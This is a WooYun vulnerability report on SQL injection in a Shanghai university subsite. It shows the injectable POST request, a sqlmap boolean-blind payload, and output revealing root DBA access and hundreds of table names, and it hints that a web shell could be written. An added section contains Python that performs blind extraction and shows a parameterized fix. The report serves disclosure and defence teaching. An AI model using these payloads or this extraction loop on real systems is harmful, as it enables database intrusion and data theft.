Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0159203

Title: SQL injection on a sub-site of Shanghai University of Traditional Chinese Medicine (上海中医药大学) (DBA privileges)

Vendor: shutcm.edu.cn

Author: 路人甲

Submitted: 2015-12-08 09:02

Fixed: 2016-01-21 18:22

Published: 2016-01-21 18:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner (CCERT Education Network Emergency Response Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability Details

Disclosure status:

2015-12-08: details sent to the vendor, awaiting vendor action
2015-12-08: vendor confirmed; details visible to the vendor only
2015-12-18: details disclosed to core white hats and domain experts
2015-12-28: details disclosed to regular white hats
2016-01-07: details disclosed to intern white hats
2016-01-21: details disclosed to the public

Brief description:

As per the title.

Details:

POST /portal/index.php?option=com_gsresource HTTP/1.1
Content-Length: 272
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**
Cookie: 8fba71df95b59713a160aa595606409e=3t1a8uvjfognjmt8go3nivcb86; MoodleSession=ar564lijhkha75jkbtbiu1nn32; MoodleSessionTest=xbJ2XFCNIC; MOODLEID_=%25ED%25C3%251CC%25B7d
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
search=%e6%90%9c%e7%b4%a2&key=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&option=com_gsresource&range=title&task=resultshow&vd=*


The vd parameter is injectable.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: search=%e6%90%9c%e7%b4%a2&key=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&option=com_gsresource&range=title&task=resultshow&vd=-3315 OR 8251=8251-- ArTZ
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'gsplatform'
current user is DBA: True
available databases [5]:
[*] gsplatform
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


[21:19:25] [INFO] fetching tables for database: 'gsplatform'
[21:19:25] [INFO] fetching number of tables for database 'gsplatform'
[21:19:25] [WARNING] reflective value(s) found and filtering out
[21:19:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:19:25] [INFO] retrieved: 309
[21:20:07] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[21:20:07] [INFO] retrieved: adodb_logsql
[21:20:38] [INFO] retrieved: app_course
[21:21:01] [INFO] retrieved: app_course_assignment
[21:21:37] [INFO] retrieved: app_device
[21:21:55] [INFO] retrieved: app_experiment
[21:22:25] [INFO] retrieved: app_experiment_article
[21:22:51] [INFO] retrieved: app_experiment_class
[21:23:10] [INFO] retrieved: app_experiment_device_map
[21:23:41] [INFO] retrieved: app_experiment_tool
[21:23:58] [INFO] retrieved: app_experiment_type
[21:24:13] [INFO] retrieved: app_experiment_type_int
[21:24:32] [INFO] retrieved: app_info_link
[21:24:55] [INFO] retrieved: gs_cm_dateinfo
[21:25:31] [INFO] retrieved: gs_cm_main
[21:25:45] [INFO] retrieved: gs_cm_roominfo
[21:26:09] [INFO] retrieved: gs_cm_terminfo
[21:26:34] [INFO] retrieved: gs_rm_category
[21:27:03] [INFO] retrieved: gs_rm_converted
[21:27:32] [INFO] retrieved: gs_rm_filetag
[21:27:53] [INFO] retrieved: gs_rm_log
[21:28:05] [INFO] retrieved: gs_rm_main
[21:28:47] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[21:28:50] [INFO] retrieved: gs_rm_tags
[21:29:03] [INFO] retrieved: gs_rm_vote
[21:29:17] [INFO] retrieved: gs_rm_votelog
[21:29:30] [INFO] retrieved: jos_attachments
[21:30:08] [INFO] retrieved: jos_banner
[21:30:26] [INFO] retrieved: jos_bannerclient
[21:30:47] [INFO] retrieved: jos_bannertrack
[21:31:30] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[21:31:56] [INFO] retrieved: jos_categories
[21:32:23] [INFO] retrieved: jos_components
[21:32:48] [INFO] retrieved: jos_contact_details
[21:33:22] [INFO] retrieved: jos_content
[21:33:36] [INFO] retrieved: jos_content_frontpage
[21:34:05] [INFO] retrieved: jos_content_rating
[21:34:24] [INFO] retrieved: jos_core_acl_aro
[21:34:52] [INFO] retrieved: jos_core_acl_aro_groups
[21:35:14] [INFO] retrieved: jos_core_acl_aro_map
[21:35:29] [INFO] retrieved: jos_core_acl_aro_sections
[21:35:57] [INFO] retrieved: jos_core_acl_groups_aro_map
[21:36:40] [INFO] retrieved: jos_core_log_items
[21:37:07] [INFO] retrieved: jos_core_log_searches
[21:37:31] [INFO] retrieved: jos_groups
[21:37:48] [INFO] retrieved: jos_hwdvidsantileech
[21:38:28] [INFO] retrieved: jos_hwdvidscategories
[21:39:04] [INFO] retrieved: jos_hwdvidschannels
[21:39:27] [INFO] retrieved: jos_hwdvidsfavorites
[21:39:54] [INFO] retrieved: jos_hwdvidsflagged_groups
[21:40:34] [INFO] retrieved: jos_hwdvidsflagged_videos
[21:41:02] [INFO] retrieved: jos_hwdvidsgroup_membership
[21:41:46] [INFO] retrieved: jos_hwdvidsgroup_videos
[21:42:09] [INFO] retrieved: jos_hwdvidsgroups
[21:42:19] [INFO] retrieved: jos_hwdvidsgs
[21:42:28] [INFO] retrieved: jos_hwdvidslogs_archive
[21:43:02] [INFO] retrieved: jos_hwdvidslogs_favours
[21:43:26] [INFO] retrieved: jos_hwdvidslogs_views
[21:43:44] [INFO] retrieved: jos_hwdvidslogs_votes
[21:44:01] [INFO] retrieved: jos_hwdvidsplaylists
[21:44:27] [INFO] retrieved: jos_hwdvidsrating
[21:44:46] [INFO] retrieved: jos_hwdvidsss
[21:45:00] [INFO] retrieved: jos_hwdvidssubs
[21:45:16] [INFO] retrieved: jos_hwdvidsvideo_category
[21:45:56] [INFO] retrieved: jos_hwdvidsvideos
[21:46:06] [INFO] retrieved: jos_joomdle_bundles
[21:46:47] [INFO] retrieved: jos_joomdle_course_applications
[21:47:38] [INFO] retrieved: jos_joomdle_field_mappings
[21:48:14] [INFO] retrieved: jos_joomdle_mailinglists
[21:48:46] [INFO] retrieved: jos_joomdle_profiletypes
[21:49:18] [INFO] retrieved: jos_joomdle_purchased_courses
[21:50:01] [INFO] retrieved: jos_menu
[21:50:14] [INFO] retrieved: jos_menu_types
[21:50:33] [INFO] retrieved: jos_messages
[21:50:51] [INFO] retrieved: jos_messages_cfg
[21:51:08] [INFO] retrieved: jos_migration_backlinks
[21:51:54] [INFO] retrieved: jos_modules
[21:52:12] [INFO] retrieved: jos_modules_menu
[21:52:32] [INFO] retrieved: jos_newsfeeds
[21:52:59] [INFO] retrieved: jos_plugins
[21:53:45] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[21:53:52] [INFO] retrieved: jos_poll_data
[21:54:15] [INFO] retrieved: jos_poll_date
[21:54:28] [INFO] retrieved: jos_poll_menu
[21:54:50] [INFO] retrieved: jos_polls
[21:54:58] [INFO] retrieved: jos_sections
[21:55:25] [INFO] retrieved: jos_session
[21:55:42] [INFO] retrieved: jos_stats_agents
[21:56:14] [INFO] retrieved: jos_templates_menu
[21:56:54] [INFO] retrieved: jos_users
[21:57:11] [INFO] retrieved: jos_weblinks
[21:57:34] [INFO] retrieved: mdl_assignment
[21:58:09] [INFO] retrieved: mdl_assignment_submissions
[21:58:46] [INFO] retrieved: mdl_backup_config
[21:59:20] [INFO] retrieved: mdl_backup_courses
[21:59:39] [INFO] retrieved: mdl_backup_files
[21:59:57] [INFO] retrieved: mdl_backup_ids
[22:00:12] [INFO] retrieved: mdl_backup_log
[22:00:33] [INFO] retrieved: mdl_block
[22:00:48] [INFO] retrieved: mdl_block_instance
[22:01:21] [INFO] retrieved: mdl_block_pinned
[22:01:50] [INFO] retrieved: mdl_block_rss_client
[22:02:27] [INFO] retrieved: mdl_block_search_documents
[22:03:11] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[22:03:39] [INFO] retrieved: mdl_cache_filters
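The sqlmap output above reports a boolean-based blind injection through `vd`: the payload `-3315 OR 8251=8251-- ArTZ` turns a query that matches nothing into one that matches everything, and sqlmap then recovers data one comparison at a time by watching whether the page changes. The example below is added here and is not code from the report or from the com_gsresource component. It models the bug class with an in-memory SQLite table named `resource(id, title, vd)` (an assumption; the real gs_rm_* schema is not on the page) and constructed sample rows, reproduces the true/false oracle with the report's own payload, extracts a value through that oracle the way a boolean-based blind tool does, and shows the parameterized query that closes the hole. SQLite's `unicode()` stands in for MySQL's `ord()`/`ascii()`.

```python
"""Added example, not part of the WooYun report: the vd injection modelled
on SQLite, a boolean-based blind extraction loop over it, and the fix."""
import sqlite3

# Constructed sample data standing in for the gsplatform database.
ROWS = [
    (1, "Anatomy video 1", 100),
    (2, "Pharmacology lecture", 101),
    (3, "Acupuncture practice", 102),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE resource(id INTEGER, title TEXT, vd INTEGER)")
    conn.executemany("INSERT INTO resource VALUES (?, ?, ?)", ROWS)
    return conn


def search_vulnerable(conn, key, vd):
    """The bug class in the report: `key` is bound, but `vd` is pasted
    straight into the SQL text, so 'vd=-3315 OR 8251=8251-- x' rewrites
    the WHERE clause."""
    sql = f"SELECT id, title FROM resource WHERE title LIKE ? AND vd = {vd}"
    return conn.execute(sql, (f"%{key}%",)).fetchall()


def search_fixed(conn, key, vd):
    """Hardened form: vd is validated as an integer and both values are
    bound parameters, so attacker input never becomes SQL syntax.
    Returns None (and sends nothing to the DB) when vd is not an integer."""
    try:
        vd_int = int(vd)
    except (TypeError, ValueError):
        return None
    return conn.execute(
        "SELECT id, title FROM resource WHERE title LIKE ? AND vd = ?",
        (f"%{key}%", vd_int),
    ).fetchall()


def blind_extract(conn, subquery, max_len=64):
    """Recover the string returned by `subquery` using only a yes/no
    oracle, as sqlmap's boolean-based blind technique does. No row has
    vd = -3315, so the result set is non-empty exactly when the injected
    condition is true. Strings longer than max_len are truncated."""

    def is_true(cond):
        return len(search_vulnerable(conn, "", f"-3315 OR ({cond})-- x")) > 0

    # Binary-search the length: smallest L for which 'length > L' is false.
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if is_true(f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    # Binary-search each character over the ASCII range (MySQL: ord()/ascii()).
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "", "-3315 OR 8251=8251-- ArTZ"))  # every row
    print(search_vulnerable(db, "", "-3315 OR 8251=8252-- ArTZ"))  # no rows
    print(blind_extract(db, "SELECT title FROM resource WHERE id = 1"))
    print(search_fixed(db, "", "-3315 OR 8251=8251-- ArTZ"))      # None
```

Two points for anyone triaging a finding like this. The extraction loop needs only the difference between a "some rows" and a "no rows" response, which is why sqlmap could enumerate 309 tables despite the timeouts in the log. And because the application connects as `root@localhost`, the queries run locally on the database host; a firewall rule on the database port, which is what the vendor reply below describes, changes nothing about what an attacker can do through the web application itself.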

Proof of vulnerability:

Remediation:

MySQL DBA privileges; if the path is known, a shell can be written...

Copyright notice: please credit 路人甲@乌云 when reposting


Vendor Response

Vendor response:

Severity: Medium

Rank: 6

Confirmed: 2015-12-08 10:43

Vendor reply:

The database port has been closed via the system firewall; it cannot be reached from the campus network.

Latest status:

None yet